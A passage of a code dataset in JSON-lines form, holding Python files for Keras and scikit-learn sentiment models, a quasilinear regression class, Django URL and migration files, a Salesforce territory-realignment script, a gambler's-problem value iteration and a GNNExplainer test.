JSON\n\ntest_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)\nprint(json.dumps({\n 'test_loss': str(test_loss),\n 'test_acc': str(test_acc),\n}))\n\n\n# Write output files to Valohai outputs directory\n# This enables Valohai to version your data \n# and upload output it to the default data store\n\npath = os.getenv('VH_OUTPUTS_DIR', './outputs')\nmodel.save(os.path.join(path, 'model.h5'))\n", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 34, "usage_type": "attribute"}, {"api_name": 
"tensorflow.keras.optimizers.Adam", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 37, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.LambdaCallback", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 54, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}]}
+{"seq_id": "387057957", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 1 20:09:00 2016\n\n@author: mac\n\"\"\"\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.multiclass import OneVsRestClassifier, OneVsOneClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn import metrics, tree, cross_validation\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import RandomizedLogisticRegression\nimport glob\nimport codecs\n\ndata = {\"train\": {\"pos\": [], \"neg\": []},\n \"test\": {\"pos\": [], \"neg\": []}}\n\ntxt_types = [(\"train\", \"neg\"), (\"train\", \"pos\"), (\"test\", \"neg\"), (\"test\", \"pos\")]\n\n# with open should add encoding='utf-8', errors='ignore' \n#otherwise failed \"'ascii' codec can't decode byte 0xc3 in position 404: ordinal not in range(128)\"\nfor t in txt_types:\n for txt_file in glob.glob(\"aclImdb/\" + t[0] + \"/\" + t[1] + \"/*.txt\"):\n with codecs.open(txt_file, \"r\",encoding='utf-8', errors='ignore') as f:\n text = f.read()\n data[t[0]][t[1]].append(text)\n#list(data[\"train\"][\"neg\"])[0]\n# get training + test data\n\nimport numpy as np\nX_train = data[\"train\"][\"pos\"] + data[\"train\"][\"neg\"]\ny_train = np.append(np.ones(len(data[\"train\"][\"pos\"])), np.zeros(len(data[\"train\"][\"neg\"])))\n\nX_test = data[\"test\"][\"pos\"] + data[\"test\"][\"neg\"]\ny_test = np.append(np.ones(len(data[\"test\"][\"pos\"])), np.zeros(len(data[\"test\"][\"neg\"])))\nprint(len(X_train), len(y_train))\nprint(len(X_test), len(y_test))\n\n#tfidf transformation is automately employed in Pipeline\n## tfidf = TfidfVectorizer()\n## tfidf.fit_transform(X_train)\n\n# build a pipeline - SVC\nfrom sklearn.pipeline import Pipeline\ntext_clf = Pipeline([('vect', CountVectorizer(ngram_range=(1, 2))),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(random_state=0)))\n ])\n\n# fit using pipeline\nclf = text_clf.fit(X_train, y_train)\n\n# predict\npredicted = clf.predict(X_test)\nclf.score(X_test, y_test) \n\n# print metrics\nprint(metrics.classification_report(y_test, predicted))\n\n#scores = cross_validation.cross_val_score(text_clf, X_train + X_test, np.append(y_train, y_test), cv=5)\n\n#First we have to one-hot encode the text, but let's limit the features to the most common 20,000 words.\nfrom collections import Counter\n\nmax_features = 20000\nall_words = []\n\nfor text in X_train + X_test:\n all_words.extend(text.split())\nunique_words_ordered = [x[0] for x in Counter(all_words).most_common()] #x[1] times\nword_ids = {}\nrev_word_ids = {}\nfor i, x in enumerate(unique_words_ordered[:max_features-1]):\n word_ids[x] = i + 1 # so we can pad with 0s\n rev_word_ids[i + 1] = x\n\n\nX_train_one_hot = []\nfor text in X_train:\n t_ids = [word_ids[x] for x in text.split() if x in word_ids]\n X_train_one_hot.append(t_ids)\n \nX_test_one_hot = []\nfor text in X_test:\n t_ids = [word_ids[x] for x in text.split() if x in word_ids]\n X_test_one_hot.append(t_ids)\n \n \n#Now we can use Keras, a popular Theano wrapper, to quickly build an NN classifier.\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nfrom keras.preprocessing import sequence\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Embedding\nfrom keras.layers import LSTM, SimpleRNN, GRU\n\nmaxlen = 80 # cut texts after this number of 
words (among top max_features most common words)\nbatch_size = 32\n\nprint('Pad sequences (samples x time)')\nX_train = sequence.pad_sequences(X_train_one_hot, maxlen=maxlen)\nX_test = sequence.pad_sequences(X_test_one_hot, maxlen=maxlen)\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, dropout=0.2))\nmodel.add(LSTM(128, dropout_W=0.2, dropout_U=0.2)) # try using a GRU instead, for fun\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\n# try using different optimizers and different optimizer configs\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nprint('Train...')\nmodel.fit(X_train, y_train, batch_size=batch_size, nb_epoch=15,\n validation_data=(X_test, y_test))\nscore, acc = model.evaluate(X_test, y_test,\n batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc)\n", "sub_path": "reference/movie_review_test.py", "file_name": "movie_review_test.py", "file_ext": "py", "file_size_in_byte": 4466, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "glob.glob", "line_number": 27, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfTransformer", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.multiclass.OneVsRestClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 62, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 96, "usage_type": "attribute"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 108, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 109, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 114, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 115, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 116, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "90054734", "text": "from scipy import stats\nfrom enum import Enum\nimport numpy as np\nfrom collections import OrderedDict\nfrom stats.Distributions import stats as mystats\nfrom stats.Regressions.QuasilinearModels import *\nfrom stats.Regressions.LinearRegression import LinearRegression\nfrom stats.Regressions.AbstractRegression import AbstractRegression\n\ntry:\n\tfrom PyQt5 import QtCore\n\t_ = QtCore.QCoreApplication.translate\nexcept:\n\t_ = lambda cont, text: text\n\nMODELS = {\n\t2:\tSqrtModel,\n\t3:\tHyperbolicModel,\n\t4:\tInvLinearModel,\n\t5:\tXInvLinearModel,\n\t6:\tLnModel,\n\t7:\tPowModel,\n\t8:\tExpModel,\n\t9:\tCubicModel,\n\t10:\tExpInvModel,\n\t11: InvHyperbolicModel,\n\t12: InvExpModel\n}\n\nclass QLRM(Enum):\n\tSqrtModel = 2\n\tHyperbolicModel = 3\n\tInvLinearModel = 4\n\tXInvLinearModel = 5\n\tLnModel = 6\n\tPowModel = 7\n\tExpModel = 8\n\tCubicModel = 9\n\tExpInvModel = 10\n\tInvHyperbolicModel = 11\n\tInvExpModel = 12\n\nclass QuasilinearRegression(AbstractRegression):\n\tdef __init__(self, model=None):\n\t\tself._a = 0\n\t\tself._b = 0\n\t\tself._model = model\n\t\tif isinstance(model, QLRM):\n\t\t\tself._model = MODELS[model.value]\n\t\telif isinstance(model, int):\n\t\t\tself._model = MODELS[model]\n\n\tdef _init_linear_model(self, model):\n\t\tregr = LinearRegression()\n\t\tif isinstance(model, QLRM):\n\t\t\tmodel = MODELS[model.value]\n\t\telif isinstance(model, int):\n\t\t\tmodel = MODELS[model]\n\t\tif model == XInvLinearModel:\n\t\t\tpsi = model.psi(self._y, self._X)\n\t\telse:\n\t\t\tpsi = model.psi(self._y)\n\t\tphi = model.phi(self._X)\n\t\tregr.fit(phi, psi, 1 - self._gamma)\n\t\treturn regr\n\n\tdef _find_model(self):\n\t\tlinregressions = dict()\n\t\tfor i in MODELS.keys():\n\t\t\tlinregressions[i] = self._init_linear_model(MODELS[i])\n\t\tkv = 2\n\t\tSSR = linregressions[2].SSR()\n\t\tfor i in linregressions.keys():\n\t\t\tSSR1 = linregressions[i].SSR()\n\t\t\tif SSR1 < SSR:\n\t\t\t\tkv = i\n\t\t\t\tSSR = SSR1\n\t\tself._model = MODELS[kv]\n\n\tdef _fit(self, X, y, alpha=0.05):\n\t\ta = 0\n\t\tb = 0\n\t\tself._X = X\n\t\tself._y = y\n\t\tself._gamma = 1 - alpha\n\t\tif self._model is None:\n\t\t\tself._find_model()\n\t\tphi = self._model.phi(X)\n\t\targs = [y]\n\t\tif self._model == XInvLinearModel:\n\t\t\targs.append(X)\n\t\tpsi = self._model.psi(*args)\n\t\tlinreg = LinearRegression()\n\t\tlinreg.fit(phi, psi, 1 - self._gamma)\n\t\tB, A = linreg.get_params()\n\t\tself._a = A\n\t\tself._b = B\n\t\treturn self\n\n\tdef _get_psi(self, model):\n\t\ty = self._y\n\t\tX = self._X\n\t\targs = [y]\n\t\tif model == XInvLinearModel:\n\t\t\targs.append(X)\n\t\tpsi = model.psi(*args)\n\t\treturn psi\n\n\tdef _get_params(self):\n\t\treturn (self._a, self._b)\n\n\tdef _get_paramsdict(self):\n\t\tX = self._X\n\t\ty = self._y\n\t\tphi = self._model.phi(X)\n\t\targs = [y]\n\t\tif self._model == XInvLinearModel:\n\t\t\targs.append(X)\n\t\tpsi = self._model.psi(*args)\n\t\tlinreg = LinearRegression()\n\t\tlinreg.fit(phi, psi, 1 - self._gamma)\n\t\ttests = linreg.get_paramsdict()\n\t\treturn tests\n\n\tdef _predict(self, X):\n\t\tN = X.shape[0]\n\t\tphi = self._model.phi(X)\n\t\tA = self._a\n\t\tB = self._b\n\t\ty = A + B * phi\n\t\tif self._model in [MODELS[7], MODELS[8], MODELS[10]]:\n\t\t\ty = np.exp(y)\n\t\telif self._model in [MODELS[4], MODELS[11], MODELS[12]]:\n\t\t\ty = 1 / y\n\t\telif self._model in [MODELS[5]]:\n\t\t\ty = y / X\n\t\t\ty = 1 / y\n\t\telif self._model in [MODELS[2]]:\n\t\t\ty = np.sqrt(y)\n\t\treturn y\n\n\tdef _plot(self, 
ax):\n\t\tself.plotRegressionLine(ax)\n\t\t#self.plotConfidentInterval(ax)\n\t\t#self.plotTolerantBounds(ax)\n\n\tdef _plotRegressionLine(self, ax=None):\n\t\tX = np.linspace(self._X.min(), self._X.max(), self._X.shape[0])\n\t\ty = self.predict(X)\n\t\tlabel = _(\"QuasilinearRegression\", \"Quasilinear regression\")\n\t\tax.plot(X, y, \"g-\", lw=3, label=label)\n\n\tdef _plotConfidentInterval(self, ax):\n\t\tX = np.linspace(self._X.min(), self._X.max(), self._X.shape[0])\n\t\ty = self.predict(X)\n\t\tintercept = self._a\n\t\tslope = self._b\n\t\tN = self._X.shape[0]\n\t\tphi = self._model.phi(X)\n\t\tif self._model == XInvLinearModel:\n\t\t\tpsi = self._model.psi(y, X)\n\t\telse:\n\t\t\tpsi = self._model.psi(y)\n\t\tt = stats.t.ppf(0.5 - self._gamma / 2, N - 2)\n\t\tx0, Syx0 = mystats.var_y_x(phi, psi, intercept, slope)\n\t\tadd = t * Syx0\n\t\tax.plot(X, y + add, \"k-\", lw=2, label=_(\"2D\", \"Confidential intervals\"))\n\t\tax.plot(X, y - add, \"k-\", lw=2)\n\n\tdef _plotTolerantBounds(self, ax=None):\n\t\tX = np.linspace(self._X.min(), self._X.max(), self._X.shape[0])\n\t\tN = X.shape[0]\n\t\ty = self.predict(X)\n\t\tt = stats.t.ppf(0.5 - self._gamma / 2, N - 2)\n\t\tSSR = np.sqrt(self.SSR())\n\t\taddp = SSR * t\n\t\tprint(addp)\n\t\tprint(SSR)\n\t\tax.plot(X, y - addp, 'm-', lw=3, label=_(\"2D\", \"Tolerant bounds\"))\n\t\tax.plot(X, y + addp, 'm-', lw=3)\n\n\tdef _SSR(self):\n\t\tX = self._X\n\t\ty = self._y\n\t\tyx = self.predict(X)\n\t\tN = X.shape[0]\n\t\tSSR = np.sum(yx - y) / (N - 2)\n\t\treturn np.abs(SSR)\n\n\t@staticmethod\n\tdef rvs(model, **kwargs):\n\t\tif isinstance(model, QLRM):\n\t\t\tmodel = model.value\n\t\tif isinstance(model, int):\n\t\t\tmodel = MODELS[model]\n\t\tN = kwargs[\"N\"]\n\t\ta = kwargs[\"a\"]\n\t\tb = kwargs[\"b\"]\n\t\txmin = kwargs[\"xmin\"]\n\t\txmax = kwargs[\"xmax\"]\n\t\teps = stats.norm.rvs(loc=kwargs[\"o\"], scale=kwargs[\"sigm\"], size=N)\n\t\tx = np.random.uniform(xmin, xmax, N)\n\t\ty = model.y(x, a, b)\n\t\ty += eps\n\t\treturn np.array([x, y]).T\n\n\nif __name__ == '__main__':\n\timport seaborn as sns\n\tkwargs = {\n\t\t\"N\": 500,\n\t\t\"a\": 1,\n\t\t\"b\": 1,\n\t\t\"o\": 0,\n\t\t\"sigm\": 0.0001,\n\t\t\"xmax\": 10,\n\t\t\"xmin\": 0\n\t}\n\tmodel = ExpModel\n\tx, y = QuasilinearRegression.rvs(model, **kwargs).T\n\tregr = QuasilinearRegression()\n\tregr.fit(x, y)\n\tprint(regr._model)\n\tprint(regr.SSR())", "sub_path": "stats/Regressions/QuasilinearRegression.py", "file_name": "QuasilinearRegression.py", "file_ext": "py", "file_size_in_byte": 5273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PyQt5.QtCore.QCoreApplication", "line_number": 12, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 12, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 30, "usage_type": "name"}, {"api_name": "stats.Regressions.AbstractRegression.AbstractRegression", "line_number": 43, "usage_type": "name"}, {"api_name": "stats.Regressions.LinearRegression.LinearRegression", "line_number": 54, "usage_type": "call"}, {"api_name": "stats.Regressions.LinearRegression.LinearRegression", "line_number": 93, "usage_type": "call"}, {"api_name": "stats.Regressions.LinearRegression.LinearRegression", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 148, "usage_type": "call"}, 
{"api_name": "numpy.linspace", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.t.ppf", "line_number": 164, "usage_type": "call"}, {"api_name": "scipy.stats.t", "line_number": 164, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 164, "usage_type": "name"}, {"api_name": "stats.Distributions.stats.var_y_x", "line_number": 165, "usage_type": "call"}, {"api_name": "stats.Distributions.stats", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 171, "usage_type": "call"}, {"api_name": "scipy.stats.t.ppf", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.stats.t", "line_number": 174, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.stats.norm.rvs", "line_number": 201, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 201, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 201, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}]}
+{"seq_id": "260673877", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom apps.views import UserDetailView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'SistemaDiscusiones.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^', include('apps.home.urls')),\n # url(r'^', include('apps.users.urls', namespace='users')),\n\n # Python social auth\n url('', include('social.apps.django_app.urls',namespace='social')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^usuario/(?P[-\\w]+)/', UserDetailView.as_view(), name='user_detail'),\n)\n", "sub_path": "SistemaDiscusiones/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 636, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 5, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.views.UserDetailView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.views.UserDetailView", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "305768720", "text": "import pandas as pd\r\nfrom files.dictionaries import vertMarkets, locSkills\r\nfrom common_functions import batches\r\nimport salesforce_login\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport datetime\r\nfrom tqdm import tqdm\r\nfrom simple_salesforce import SalesforceMalformedRequest\r\nimport time\r\nimport datetime\r\n\r\nnow = '-'.join('_'.join(str(datetime.datetime.now()).split('.')[0].split()).split(':'))\r\n\r\n\r\nsf = salesforce_login.bsna()\r\n\r\ndef realign(territory):\r\n\r\n\r\n territoryId = sf.query(f\"SELECT Id FROM Territory__c WHERE Name = '{territory}'\")['records'][0]['Id']\r\n\r\n skillSets = sf.query_all(f\"SELECT OwnerId,Skill_Set__c \\\r\n FROM Territory_SkillSet_Mapping__c WHERE Territory__r.Id = '{territoryId}' AND SkillSet_Object__c LIKE '%Account Location%'\")\r\n\r\n skillDict = {locSkills[x['Skill_Set__c']]:x['OwnerId'] for x in skillSets['records']}\r\n\r\n\r\n zips = sf.query_all(f\"SELECT Postal_Code__c FROM Postal_Code_Mapping__c WHERE Territory__c = '{territoryId}'\")\r\n zips = [x['Postal_Code__c'] for x in zips['records']]\r\n zipQuery = batches.likeBatch('Postal_Code__c', zips, 5000)\r\n\r\n def getLocations(zipQuery):\r\n\r\n loc_frames = []\r\n\r\n for query in zipQuery:\r\n\r\n security_locations = sf.query_all(f\"SELECT Associated_Location__r.Security_Owner__c,Associated_Location__r.Vertical_Market__c, \\\r\n Associated_Location__r.Vertical_Sub_Market__c, Associated_Location__c,Security_Business_ID__c \\\r\n FROM Associated_ERP_Account__c \\\r\n WHERE ({query}) AND (Associated_Location__r.Security_Owner__c != Null)\")\r\n security_locations = pd.DataFrame.from_records(security_locations['records'])\r\n loc_frames.append(security_locations)\r\n\r\n security_locations = pd.concat(loc_frames)\r\n\r\n return security_locations\r\n\r\n if len(zipQuery) == 0:\r\n return\r\n else:\r\n\r\n security_commercial = getLocations(zipQuery).groupby('Associated_Location__c').\\\r\n filter(lambda x : all(x['Security_Business_ID__c'].str.contains('Commercial'))).drop_duplicates('Associated_Location__c')\r\n\r\n security_commercial = pd.concat([security_commercial.drop(['Associated_Location__r'], axis=1),\\\r\n security_commercial['Associated_Location__r'].apply(pd.Series)], axis=1)\r\n\r\n def wrong_owner(locations):\r\n\r\n banking = locations[locations['Vertical_Market__c'].isin(vertMarkets[0])]\r\n banking.Security_Owner__c = skillDict['Security_Banking_Skill']\r\n\r\n education = locations[locations['Vertical_Market__c'].isin(vertMarkets[1])]\r\n education.Security_Owner__c = skillDict['Security_Education_Skill']\r\n\r\n slg = locations[locations['Vertical_Market__c'].isin(vertMarkets[2])]\r\n slg.Security_Owner__c = skillDict['Security_SLG_Skill']\r\n\r\n territory = locations[locations['Vertical_Market__c'].isin(vertMarkets[3])==False]\r\n territory.Security_Owner__c = skillDict['Security_TerritoryRep_Skill']\r\n\r\n wrong_owner = pd.concat([banking, education, slg, territory])[['Associated_Location__c','Security_Owner__c']]\r\n\r\n return wrong_owner\r\n\r\n updates = wrong_owner(security_commercial)\r\n updates = list(zip(updates['Associated_Location__c'], updates['Security_Owner__c']))\r\n\r\n return updates\r\n", "sub_path": "TRAMZ_2.0/compass_realignment.py", "file_name": "compass_realignment.py", "file_ext": "py", "file_size_in_byte": 3477, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "warnings.filterwarnings", "line_number": 
6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "attribute"}, {"api_name": "salesforce_login.bsna", "line_number": 16, "usage_type": "call"}, {"api_name": "files.dictionaries.locSkills", "line_number": 26, "usage_type": "name"}, {"api_name": "common_functions.batches.likeBatch", "line_number": 31, "usage_type": "call"}, {"api_name": "common_functions.batches", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 58, "usage_type": "attribute"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 62, "usage_type": "name"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 65, "usage_type": "name"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 68, "usage_type": "name"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 71, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "622328984", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('mathtutor', '0006_auto_20150929_0722'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='quiz',\n name='site',\n field=models.CharField(default=b'tutor', max_length=16, verbose_name=b'Website'),\n ),\n ]\n", "sub_path": "mathtutor/migrations/0007_quiz_site.py", "file_name": "0007_quiz_site.py", "file_ext": "py", "file_size_in_byte": 441, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "267710098", "text": "#%%\n\ngamma=1\np=0.4\nnumStates=100\nreward=[0 for _ in range(101)]\nreward[100]=1\n\ntheta=0.00000001\n\nimport matplotlib.pyplot as plt\nvalue=[0 for _ in range(101)]\npolicy=[0 for _ in range(101)]\n\ndef reinforcement_learning():\n delta=1\n while delta>theta:\n delta=0\n for i in range(1,numStates):\n oldValue=value[i]\n bellmanequation(i)\n diff=abs(oldValue-value[i])\n delta=max(delta,diff)\n plt.plot(value)\n plt.xlabel('Capital')\n plt.ylabel('Value Estimates')\n plt.title('Value function')\n\ndef bellmanequation(num):\n optimalvalue=0\n\n for bet in range(0,min(num,100-num)+1):\n win=num+bet\n loss=num-bet\n\n sum=p*(reward[win]+gamma*value[win])+(1-p)*(reward[loss]+gamma*value[loss])\n\n if sum>optimalvalue:\n optimalvalue=sum\n value[num]=sum\n policy[num]=bet\n\nreinforcement_learning() ", "sub_path": "sports_betting.py", "file_name": "sports_betting.py", "file_ext": "py", "file_size_in_byte": 916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "357896940", "text": "import pytest\nimport torch\nfrom torch.nn import Sequential, Linear, ReLU, Dropout\nimport torch.nn.functional as F\nfrom torch_geometric.nn import (GCNConv, GATConv, GNNExplainer,\n global_add_pool, MessagePassing)\n\n\nclass GCN(torch.nn.Module):\n def __init__(self):\n super(GCN, self).__init__()\n self.conv1 = GCNConv(3, 16)\n self.conv2 = GCNConv(16, 7)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n return x.log_softmax(dim=1)\n\n\nclass GAT(torch.nn.Module):\n def __init__(self):\n super(GAT, self).__init__()\n self.conv1 = GATConv(3, 16, heads=2, concat=True)\n self.conv2 = GATConv(2 * 16, 7, heads=2, concat=False)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n return x.log_softmax(dim=1)\n\n\n@pytest.mark.parametrize('model', [GCN(), GAT()])\ndef test_gnn_explainer(model):\n explainer = GNNExplainer(model, log=False)\n assert explainer.__repr__() == 'GNNExplainer()'\n\n x = torch.randn(8, 3)\n edge_index = torch.tensor([[0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7],\n [1, 0, 2, 1, 3, 2, 4, 3, 5, 4, 6, 5, 7, 6]])\n\n node_feat_mask, edge_mask = explainer.explain_node(2, x, edge_index)\n assert node_feat_mask.size() == (x.size(1), )\n assert node_feat_mask.min() >= 0 and node_feat_mask.max() <= 1\n assert edge_mask.size() == (edge_index.size(1), )\n assert edge_mask.min() >= 0 and edge_mask.max() <= 